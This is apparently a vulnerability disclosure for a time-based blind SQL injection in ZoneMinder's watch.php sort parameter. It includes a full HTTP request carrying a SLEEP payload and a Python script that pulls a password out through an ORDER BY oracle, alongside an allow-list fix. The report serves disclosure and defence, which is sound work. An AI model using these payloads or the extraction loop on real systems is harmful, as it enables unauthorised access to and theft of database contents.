Summary
Hello, I have found a SQL injection.
SQL injection is a vulnerability in which untrusted input is placed into a SQL query without proper validation or escaping, which lets an attacker change the query the application sends to its database.
The full request, with the payload in the sort parameter:
```http
GET /zm/index.php?sort=Id+AND+(SELECT+3388+FROM+(SELECT(SLEEP(8-(IF(2359>2358,0,5)))))Ingf)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1
Host: 192.168.64.124
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.64.124/zm/?view=watch&mid=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: zmSkin=classic; zmCSS=dark; _ga=GA1.1.558338520.1691501412; _ga_BN3VSG0XY4=GS1.1.1691564836.3.0.1691564836.0.0.0; zmMontageLayout=3; zmMontageScale=; zmBandwidth=high; ZMSESSID=pohkipr4k3q7qfoj6vv5dj2fi8
Connection: close
```
Details
In WWW/AJAX/watch.php, line 51, several request parameters (I tested the $sort parameter) are placed into the SQL query without sanitization, which makes it vulnerable to SQL injection.
PoC
This is the payload that triggers a sleep in the database:
```
sort=Id+AND+(SELECT+3388+FROM+(SELECT(SLEEP(8-(IF(2359>2358,0,5)))))Ingf)
```
The condition IF(2359>2358,0,5) is always true, so the inner SELECT evaluates SLEEP(8-0) and the response is delayed by about 8 seconds; with a false condition it would sleep 3 seconds instead. That difference is what makes the injection usable as a time-based blind oracle: any yes/no question about the data can be turned into a measurable change in response time.
The whole request is shown above, and the PoC screenshots are here: https://wormhole.app/lJR8k#iB3jhbqp_wx93l0bRVC0dg
Impact
An attacker can use this to extract information from the database.
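To show how an ORDER BY injection like this one is turned into data extraction, and what the fix looks like, here is an added example (my own code, not ZoneMinder's and not from the report). It uses an in-memory SQLite database with constructed tables and rows, so instead of MySQL's SLEEP() it uses an ORDER BY oracle: the injected expression sorts by one column when a condition is true and by another when it is false, and the differing row order leaks one bit per request. The hardened builder shows why prepared-statement placeholders are not the answer for a sort column (it is an identifier, not a value) and why an allow-list is.

```python
import sqlite3

# Constructed sample schema and rows (not ZoneMinder's real tables): a table
# that is listed with a user-controlled ORDER BY, and a table holding a secret.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Events (Id INTEGER PRIMARY KEY, Name TEXT);
        INSERT INTO Events VALUES (1, 'b-event'), (2, 'a-event'), (3, 'c-event');
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Users VALUES ('admin', 's3cret');
        """
    )
    return conn


def vulnerable_query(sort: str, order: str) -> str:
    """Mirrors the pattern the report describes: the sort parameter is
    concatenated straight into ORDER BY, so it becomes part of the SQL grammar."""
    return f"SELECT Id FROM Events ORDER BY {sort} {order}"


# ORDER BY takes an identifier, not a bound value, so placeholders cannot
# protect it; the fix is an allow-list of column names and sort directions.
ALLOWED_SORT = {"Id", "Name"}
ALLOWED_ORDER = {"asc", "desc"}


def hardened_query(sort: str, order: str) -> str:
    if sort not in ALLOWED_SORT:
        raise ValueError(f"sort column not allowed: {sort!r}")
    if order.lower() not in ALLOWED_ORDER:
        raise ValueError(f"sort order not allowed: {order!r}")
    return f"SELECT Id FROM Events ORDER BY {sort} {order}"


def accepts(sort: str, order: str) -> bool:
    """True if the hardened builder would run this sort/order pair."""
    try:
        hardened_query(sort, order)
        return True
    except ValueError:
        return False


def fetch_ids(conn: sqlite3.Connection, query: str) -> list:
    return [row[0] for row in conn.execute(query)]


def order_by_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean oracle through ORDER BY: sort by Id when `condition` holds and
    by Name otherwise, then compare against the known Id ordering."""
    sort = f"(CASE WHEN ({condition}) THEN Id ELSE Name END)"
    observed = fetch_ids(conn, vulnerable_query(sort, "asc"))
    baseline = fetch_ids(conn, vulnerable_query("Id", "asc"))
    return observed == baseline


CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract_password(conn: sqlite3.Connection, max_len: int = 32) -> str:
    """Recover the admin password one character at a time via the oracle."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            cond = (f"(SELECT substr(Password, {pos}, 1) FROM Users "
                    f"WHERE Username = 'admin') = '{ch}'")
            if order_by_oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of string (or outside CHARSET)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("recovered via ORDER BY oracle:", extract_password(db))
    payload = "Id AND (SELECT 3388 FROM (SELECT(SLEEP(8-(IF(2359>2358,0,5)))))Ingf)"
    print("vulnerable builder embeds it:", vulnerable_query(payload, "desc"))
    print("hardened builder accepts it:", accepts(payload, "desc"))
```

Each oracle call costs one request, so the loop above issues at most len(CHARSET) requests per character; against MySQL the same loop works with the report's SLEEP() payload by replacing the row-order comparison with a response-time threshold.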
NOTE:
If the steps are unclear or you have trouble reproducing the exploit, let me know.
- Best regards, 10xdev